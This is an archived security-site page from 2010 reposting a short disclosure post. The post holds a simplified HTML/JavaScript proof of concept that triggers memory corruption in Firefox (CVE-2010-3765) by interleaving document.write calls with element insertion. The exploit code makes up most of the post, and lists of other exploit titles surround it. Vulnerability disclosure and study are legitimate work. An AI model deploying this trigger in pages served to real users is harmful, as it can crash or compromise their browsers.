首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Firefox Memory Corruption Proof of Concept (Simplified)
来源:vfocus.net 作者:exploit-dev 发布时间:2010-10-29  

Hi there,

For those who still do not know .. The proof of concept (that I have
extracted) for CVE-2010-3765 is the following:

<html><body>
<script>

  function G(str){
    var cobj=document.createElement(str);
    document.body.appendChild(cobj);
    cobj.scrollWidth;
  }

  function crashme() {
    document.write("fooFOO");
    G("a");
    document.write("<a lang></a>a");
    G("base");
    document.write("barBAR");
    G("audio");
  }
</script>
<script>crashme();</script>
</body>
</html>

For more details:
http://extraexploit.blogspot.com/2010/10/cve-2010-3765-proof-of-concept.html
--
http://extraexploit.blogspot.com


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox Interleaving document.
·Linux Kernel VIDIOCSMICROCODE
·Platinum SDK Library post upnp
·Safe Returner 1.27.5 Commandli
·XBMC 9.04.1r20672 soap_action_
·Kaspersky Updater GUI 2.2.0.72
·Home FTP Server Post-Auth Dire
·DATAC RealWin SCADA 1.06 Buffe
·DATAC RealWin SCADA 1.06 Buffe
·MinaliC Webserver v1.0 Denial
·CoWebserver Denial of Service
·Apache 2.0 - (apterous) file D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved